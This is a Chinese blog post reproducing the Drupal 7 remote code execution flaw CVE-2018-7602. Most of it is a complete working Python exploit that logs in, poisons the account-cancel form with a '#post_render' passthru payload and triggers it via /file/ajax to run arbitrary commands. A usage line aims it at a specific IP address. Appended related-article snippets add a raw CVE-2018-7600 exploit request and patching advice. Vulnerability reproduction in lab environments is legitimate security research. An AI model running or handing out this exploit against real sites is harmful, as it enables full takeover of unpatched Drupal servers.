漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)

最新推荐文章于 2024-06-22 09:52:18 发布
最新推荐文章于 2024-06-22 09:52:18 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/127477644
版权

文章目录

描述

Drupal 7.x8.x 的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。

POC

#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                    epilog= '''
                    This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
                    using an valid account and poisoning the cancel account form (user_cancel_confirm_form) 
                    with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).
                    ''')

  parser.add_argument("user", help="Username")
  parser.add_argument("password", help="Password")
  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  parser.add_argument("-x", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  args = parser.parse_args()
  return args

def pwn_target(target, username, password, function, command, proxy):
  requests.packages.urllib3.disable_warnings()
  session = requests.Session()
  proxyConf = {'http': proxy, 'https': proxy}
  try:
    print('[*] Creating a session using the provided credential...')
    get_params = {'q':'user/login'}
    post_params = {'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'}
    print('[*] Finding User ID...')
    session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
    get_params = {'q':'user'}
    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    user_id = soup.find('meta', {'property': 'foaf:name'}).get('about')
    if ("?q=" in user_id):
      user_id = user_id.split("=")[1]
    if(user_id):
      print('[*] User ID found: ' + user_id)
    print('[*] Poisoning a form using \'destination\' and including it in cache.')
    get_params = {'q': user_id + '/cancel'}
    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
    form_token = form.find('input', {'name': 'form_token'}).get('value')
    get_params = {'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[%23post_render][]=' + function + '&q[%23type]=markup&q[%23markup]=' + command }
    post_params = {'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'}
    r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
    if form_build_id:
        print('[*] Poisoned form ID: ' + form_build_id)
        print('[*] Triggering exploit to execute: ' + command)
        get_params = {'q':'file/ajax/actions/cancel/#options/path/' + form_build_id}
        post_params = {'form_build_id':form_build_id}
        r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
        parsed_result = r.text.split('[{"command":"settings"')[0]
        print(parsed_result)
  except:
    print("ERROR: Something went wrong.")
    raise

def main():
  print ()
  print ('===================================================================================')
  print ('|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |')
  print ('|                                   by pimps                                      |')
  print ('===================================================================================\n')

  args = get_args() # get the cl args
  pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
  main()

复现过程

-c 后面接命令,紧随账号,密码

python3 drupa7-CVE-2018-7602.py -c "ls /tmp" admin 123456 http://123.58.224.8:47582

在这里插入图片描述
在这里插入图片描述

漏洞复现Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 1048
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600)
qq_51577576的博客
02-18 825
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。
Drupal 远程代码执行漏洞复现CVE-2018-7602
Tauil的博客
08-08 1083
使用parse_str,并存入options,还需要通过其他步骤来触发漏洞。的输入来处理请(GET,POST,COOKIE,REQUEST)中数据。建立vulhub/drupal/CVE-2018-7602/环境。访问http://靶机IP/shell.php即可看到新建的网页。使用以下poc.py,与官网不同的是强制定义命令为。对CVE-2018-7600漏洞的补丁通过过滤带有。会导致输入错误等等原因,所以进行了一点修改。中的URL进行URL编码,当对URL中的。形式的请求,发起请求需要对。...
Drupal 远程代码执行漏洞CVE-2018-7602漏洞复现
ADummy的博客
02-23 1189
Drupal 远程代码执行漏洞CVE-2018-7602) by ADummy 0x00利用路线 ​ poc直接打 0x01漏洞介绍 ​ 此漏洞源于对编号为CVE-2018-7600的漏洞修复不完全,导致补丁被绕过,攻击者可以利用Drupal网站漏洞,需要登录且有删除权限后触发执行恶意代码,导致网站被完全控制。 影响版本 Drupal < 7.58 Drupal < 8.3.9 Drupal < 8.4.6 Drupal < 8.5.1 0x02漏洞复现 exp地址:pi
drupal漏洞复现
qq_45230030的博客
01-04 1453
drupal cms 漏洞复现
Drupal远程代码执行漏洞CVE-2019-6339)
weixin_46411728的博客
08-25 2875
Drupal 远程代码执行漏洞CVE-2019-6339)
CVE-2018-7600 Drupal核心远程代码执行漏洞分析
weixin_34246551的博客
12-27 377
0x01 漏洞介绍 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。...
CVE-2018-7602 Drupal 远程代码执行漏洞复现
yzl_007的博客
08-09 1093
CVE-2018-7602 Drupal 远程代码执行漏洞复现 https://blog.51cto.com/u_14259144/2421816 漏洞描述 DrupalDrupal社区的一套使用PHP语言开发的开源内容管理系统。 此漏洞源于对编号为CVE-2018-7600的漏洞修复不完全,导致补丁被绕过,攻击者可以利用Drupal网站漏洞,需要登录且有删除权限后触发执行恶意代码,导致网站被完全控制。 环境搭建 同样的vulhub镜像搭建,这里不再演示 搭建完成如下 登陆部分漏洞,利用poc命令执行,
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践
gitblog_00043的博客
06-22 670
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践 去发现同类优质开源项目:https://gitcode.com/ 在网络安全的暗潮中,漏洞是永远的话题。今天,我们将深入探讨一个专为Drupal 7设计的安全研究工具,该工具针对著名的CVE-2018-7600与CVE-2018-7602漏洞进行了精准打击。对于那些对Web安全充满好奇,或是负责网站维护、安全审计的专业人士而言,这无疑是一个...
Drupal漏洞Drupal 7.31 SQL漏洞
2301_77778745的博客
04-25 742
1.通过python调用drupal7.x.py脚本对数据库进行注入。test test(后面两个test是新设的用户名和密码)2.输入命令:python drupal7.x.py。
Drupal远程代码执行漏洞CVE-2018-7602
m0_49025459的博客
12-06 782
漏洞概述 这个漏洞CVE-2018-7600的绕过利用,两个漏洞原理是一样的。攻击者可以通过不同方式利用该漏洞远程执行代码。CVE-2018-7602这个漏洞CVE-2018-7600的另一个利用点,只是入口方式不一样。所以,一旦参数可控并且没有经过正确的过滤,就很有可能出问题。 影响版本 Drupal < 7.58 Drupal < 8.3.9 Drupal < 8.4.6 Drupal < 8.5.1 复现过程 http://10.95.14.161:64829/node 账号密码admin/123
Drupal远程代码执行漏洞CVE-2018-7600)
ANOrange的博客
04-10 1268
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 5824
CVE-2018-7600漏洞学习与复现
Drupal漏洞复现CVE-2019-6341
weixin_59086772的博客
12-30 2425
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞CVE-2018-7602
qq_51577576的博客
02-19 1087
[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞CVE-2018-7602Drupal由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。CVE-2018-7602这个漏洞CVE-2018-7600的绕过利用,两个漏洞原理是一样的。
Drupal 远程代码执行漏洞CVE-2018-7602
07-19 3159
漏洞复现:1.如下图所示,执行以下命令即可复现漏洞。示例命令为 id,如图红框中显示,可以执行该命令。 "id"为要执行的命令 第一个drupal为用户名 第二个drupal为密码 python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://ip:8081/2.得有CVE-2018-7600的PoC。 #!/usr/bin/en...
CVE-2018-7600
最新发布
03-19
### CVE-2018-7600 漏洞详情 CVE-2018-7600 是一个影响 Drupal 内核的严重远程代码执行漏洞,通常被称为“Drupalgeddon 2”。该漏洞存在于 Drupal 的 `form_set_value()` 函数中,攻击者可以通过向特定 URL 发送恶意请求来触发此漏洞并实现远程代码执行。受影响的主要版本包括 Drupal 7.x 和部分未及时更新的分支。 #### 影响范围 - **主要受影响版本**: Drupal 7.x 版本(具体为 7.30 至 7.58) - **修复后的版本**: Drupal 7.58 及更高版本[^4] --- ### 攻击方式 攻击者可以利用以下路径发起攻击: ```http POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 Host: target_ip:port Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Cache-Control: no-cache form_id=user_register_form&_triggering_element_name=&_triggering_element_value= ``` 上述请求中的参数 `_triggering_element_name` 和 `_triggering_element_value` 被用于注入恶意 PHP 代码。如果目标系统未打补丁,则可能导致任意代码执行--- ### 修复方法 为了防止被攻击,应采取以下措施之一或多个组合策略: 1. **升级至安全版本** -Drupal 更新到最新稳定版本(至少为 7.58 或更高)。官方已发布针对此漏洞安全修补程序。 2. **应用临时缓解措施** - 如果无法立即完成升级,可禁用注册功能或将站点设置为维护模式以减少暴露风险。这可通过修改配置文件或管理界面实现。 ```bash drush vset user_register 0 --yes ``` 3. **部署 WAF 防护** - 使用 Web 应用防火墙(WAF),拦截可能携带恶意负载的流量。例如,ModSecurity 中可以添加自定义规则阻止敏感 URI 请求。 4. **定期审计日志** - 定期检查服务器访问日志,寻找异常行为迹象,特别是涉及 `/user/register` 接口的可疑 POST 请求。 --- ### 复现环境搭建与测试 对于研究目的,在受控环境中重现漏洞有助于理解其机制。以下是基本流程: 1. 下载易受攻击的 Drupal 版本(如 7.57)并安装; 2. 利用公开 POC 工具验证是否存在漏洞; 3. 成功后尝试上传 shell 文件或其他形式的有效载荷。 注意:仅限合法授权下的实验活动! --- ### 注意事项 即使成功修复了 CVE-2018-7600,也建议持续关注其他潜在威胁。例如,后续还出现了类似的 RCE 缺陷——CVE-2019-6340,因此保持软件始终处于最新状态至关重要[^5]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值